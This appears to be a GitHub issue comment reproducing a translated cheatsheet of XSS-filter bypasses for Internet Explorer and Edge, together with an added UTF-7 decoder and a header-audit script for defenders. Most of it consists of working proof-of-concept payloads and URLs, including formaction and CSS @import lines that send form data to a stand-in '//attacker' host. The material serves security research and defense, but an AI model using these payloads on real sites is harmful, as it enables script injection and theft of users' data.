/DA (/Helv 12 Tf 0 g)
/F 4
/FT /Tx
/Rect [ 9.526760 680.078003 297.527008 702.078003 ]
/Subtype /Widget
/Type /Annot
% PARAMETER NAME
/T (q)
% PARAMETER PAYLOAD
/V (<script>alert\(1\)</script>)
/P 4 0 R
>>
endobj
trailer
<<
/Root 1 0 R
>>
Using Content Sniffing for XML (IE only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
- X-Content-Type-Options: nosniff is missing
- The string can be written from the top of the page
Reference URL:
- https://twitter.com/0x6D6172696F/status/753647521050849280
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E
<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1&#x29;</x:script>
Using UTF-7 BOM (IE only)
Conditions for attacking:
- Character strings can be written from the top of the page
- Symbols such as +, / and - are allowed
supplement:
+/v8, +/v9, +/v+ and +/v/ are UTF-7 [BOMs](https://ja.wikipedia.org/wiki/%E3%83%90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC%E3%82%AF). In IE, if one of these strings appears at the top of the page, the page's character encoding is assumed to be UTF-7.
Even if the encoding is specified on the page, if the page is reopened via history.back(), its encoding is treated as UTF-7. (The latter behavior was reported to Microsoft in July 2013, but no change has been made to date.)
PoCs:
(If there is no character code specified on the page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-
+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-
(If the page has character code specification) https://l0.cm/bypass/ie_utf7.html
<script>
function go(){
window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(location)%2BADw-/script%2BAD4-&charset=utf-8", "a");
setTimeout(function(){window.open("https://l0.cm/h_back.html","a")},1000);
}
</script>
<button onclick=go()>go</button>
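To see what IE makes of the payload once it has decided the page is UTF-7, here is a minimal UTF-7 decoder written for this page (an added example; not code from the cheatsheet or from IE). It implements the RFC 2152 "modified base64" sections and the four BOM spellings listed above; the helper names (UTF7_BOMS, startsWithUtf7Bom, decodeUtf7, decodeUtf7Page, UTF7_POC) are this example's own, and UTF7_POC is the PoC string from this section.

```javascript
// Added example for this page (not from the cheatsheet or from IE).
// Minimal UTF-7 decoder (RFC 2152) so the payload above can be inspected the way a
// UTF-7 decoder sees it. The modified-base64 alphabet is the standard one.
const UTF7_B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

// The four byte-order-mark spellings the text lists. Each decodes to U+FEFF; they
// differ only in the two trailing padding bits, which a decoder discards.
const UTF7_BOMS = ['+/v8', '+/v9', '+/v+', '+/v/'];

function startsWithUtf7Bom(s) {
  return UTF7_BOMS.some((bom) => s.startsWith(bom));
}

// Decode a UTF-7 string. Direct characters pass through; "+...-" runs are modified
// base64 of big-endian UTF-16 code units; "+-" is a literal "+". Leftover bits that
// do not fill a 16-bit unit are discarded, as the RFC requires.
function decodeUtf7(s) {
  let out = '';
  let i = 0;
  while (i < s.length) {
    if (s[i] !== '+') { out += s[i]; i += 1; continue; }
    if (s[i + 1] === '-') { out += '+'; i += 2; continue; }
    let j = i + 1;
    let bits = 0;
    let nbits = 0;
    for (; j < s.length; j += 1) {
      const v = UTF7_B64.indexOf(s[j]);
      if (v === -1) break; // first non-base64 character ends the run
      bits = (bits << 6) | v;
      nbits += 6;
      if (nbits >= 16) {
        nbits -= 16;
        out += String.fromCharCode((bits >> nbits) & 0xffff);
        bits &= (1 << nbits) - 1;
      }
    }
    i = s[j] === '-' ? j + 1 : j; // a '-' closing the run is absorbed; anything else is kept
  }
  return out;
}

// Drop a leading U+FEFF so the decoded markup can be compared directly.
function decodeUtf7Page(s) {
  const decoded = decodeUtf7(s);
  return decoded.startsWith('\ufeff') ? decoded.slice(1) : decoded;
}

// The PoC body from this section. Note it contains only letters, digits, parentheses
// and the symbols + / - that the attack condition requires to be allowed.
const UTF7_POC = '+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-';

console.log(startsWithUtf7Bom(UTF7_POC), JSON.stringify(decodeUtf7Page(UTF7_POC)));
```

The decoded result is a plain <script>alert(1)</script>, even though no < or > ever appeared in the response bytes. That is why an output filter that only escapes angle brackets and quotes is not enough on its own: the charset must be fixed explicitly so that the browser cannot be talked into a different decoder.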
Using <?PXML> (IE only)
Conditions for attacking:
- Reflected XSS
- Fewer than three < characters appear before the injection point
- The page's document mode is 9 or lower, or it can be set to 9 or lower, for example by embedding the page in a frame
Reference URL:
- https://masatokinugawa.l0.cm/2017/05/xss13.html
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9
<?PXML><html:script>alert(1)</html:script>
https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9
<PXML><html:script>alert(1)</html:script>
Using referrers
IE/Edge's XSS filter does not work in cases with a Referer header from the same domain (including subdomains) or localhost. Bypassing is possible if such a referrer can be attached.
Use of link functions within the same domain (including subdomains)
Conditions for attacking:
- Reflected XSS
- Create links to XSS pages on the same domain (including subdomains)
PoCs:
- https://vulnerabledoma.in/bypass/same-domain-link.html
- https://www.vulnerabledoma.in/bypass/same-domain-link.html
<a href="https://vulnerabledoma.in/bypass/text?q=<script>alert(1)</script>">Click HERE</a>
Bypass where arbitrary URL can be specified
Conditions for attacking:
- There are places where reflective XSS is possible in the link
supplement:
By double linking the vulnerable part and adding a referrer, you can create a link to a `javascript:` URL without triggering the XSS filter.
PoCs:
https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)
<a href="?q=javascript%3Aalert(1)">Link</a>
If the state before submission to the vulnerable form can be maintained on the page
Conditions for attacking:
- Reflected XSS
- The state before submission to the vulnerable form can be maintained on the page of the same domain (including subdomains).
PoCs:
https://vulnerabledoma.in/bypass/form?q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B/script%3E
<form action="form">
<input type="hidden" name="q" value="&#x22;>&#x3C;script>alert&#x28;1)&#x3C;/script>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>
Using option tags
Conditions for attacking:
- There is XSS that can write arbitrary tags
- The XSS is inside an existing form
Reference URL:
- https://html5sec.org/xssfilter/entities
PoCs:
https://vulnerabledoma.in/bypass/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B/script%3E
<form action=submit>
<button formaction=form3>CLICK<select name=q><option>&lt;script>alert(1)&lt;/script>
</form>
Using an empty iframe
Conditions for attacking:
- There is XSS that can write arbitrary tags
- The page allows embedding in frames
supplement:
Creating an empty iframe with XSS and navigating a scripted URL to that frame causes a bypass due to the referrer of the vulnerable domain itself.
Reference URL:
- http://www.cracking.com.ar/bugs/2016-07-14/
PoCs:
https://l0.cm/bypass/ieedge_iframe.html
<!-- Found by @magicmac2000 -->
<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text?q=%3Ciframe%3E"></iframe>
Using formaction (getting information only)
Conditions for attacking:
- Reflected XSS
- You can write a new formaction attribute where you can submit an existing form content containing sensitive information.
PoCs:
https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/%3E
<form action="form">
<input type="hidden" name="q" value=""><button formaction=//attacker/>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>
Use of character-referenced strings in style (style description only)
Conditions for attacking:
- Reflected XSS
- Attackable with CSS
supplement:
Entity reference notation such as `@`, `:`, `\`, `(` that is part of the match string is not considered, so a bypass occurs in style blocks and in attribute values in SVG where entity reference notation is allowed.
In IE, not only attacks that read information with CSS, but in some cases scripts can be executed via `behavior:url()`.
Reference URL:
- https://twitter.com/0x6D6172696F/status/752190911879184384
- http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
- https://blog.innerht.ml/cascading-style-scripting/
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport'//attacker'%3C/style%3E
<svg><style>&commat;import'//attacker'</style>
https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27//attacker%27%3C/style%3E
<svg><style>@&bsol;0069mport'//attacker'</style>
(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10
<p style="behavior&colon;url('/bypass/usercontent/xss.txt')">
(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10
<p style="behavior:url&lpar;'/bypass/usercontent/xss.txt')">
Past bypass
Published on Fixed Bypass Archive.
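Several of the bypasses above list the same preconditions on the response itself: a missing `X-Content-Type-Options: nosniff`, no character code specified on the page, and a page that allows embedding in frames. The following is an added, defender-side example (not code from the cheatsheet or the filterbypass project) that audits a response's headers for exactly those three mitigations. Header names are the standard ones; the sample header sets, the function names and the finding strings are constructed for illustration.

```python
"""Audit HTTP response headers for the mitigations that the cheatsheet's
bypass conditions depend on. Added example, not the cheatsheet's own code;
the sample header sets below are constructed, not captured from any site."""

from typing import Dict, List


def _header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive lookup of a single header; returns '' when absent."""
    wanted = name.lower()
    for key, value in headers.items():
        if key.lower() == wanted:
            return value.strip()
    return ""


def _frame_ancestors_restricted(csp: str) -> bool:
    """True if the CSP has a frame-ancestors directive that is not a wildcard."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in parts[1:]]
            return bool(sources) and "*" not in sources
    return False


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return one finding per missing mitigation (empty list = all present).

    Each check maps to a precondition listed in the cheatsheet:
    - nosniff missing      -> the response may be sniffed as XML/HTML
    - charset missing      -> IE may honour a UTF-7 BOM at the top of the page
    - framing unrestricted -> the page can be loaded inside another site's iframe
    """
    findings: List[str] = []

    # 1. X-Content-Type-Options must be present with exactly the token "nosniff".
    if _header(headers, "X-Content-Type-Options").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff is missing")

    # 2. Content-Type must carry a non-empty charset parameter.
    content_type = _header(headers, "Content-Type")
    params = [p.strip().lower() for p in content_type.split(";")[1:]]
    has_charset = any(p.startswith("charset=") and p != "charset=" for p in params)
    if not has_charset:
        findings.append("Content-Type declares no charset")

    # 3. Framing must be restricted by X-Frame-Options or CSP frame-ancestors.
    xfo = _header(headers, "X-Frame-Options").upper()
    csp = _header(headers, "Content-Security-Policy")
    if xfo not in ("DENY", "SAMEORIGIN") and not _frame_ancestors_restricted(csp):
        findings.append("framing is not restricted (no X-Frame-Options / frame-ancestors)")

    return findings


# Constructed sample responses: one with none of the mitigations, one with all.
WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Server": "example",
}
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or ["ok"])
```

Run against the weak set it reports all three findings; against the hardened set it reports none. Headers alone are not the whole story (a `<meta charset>` in the body also fixes the encoding, and a CSP `frame-ancestors *` is deliberately treated as unrestricted here), but each finding corresponds to a condition the cheatsheet names, so an empty result removes the precondition for the corresponding entries.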
@w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it.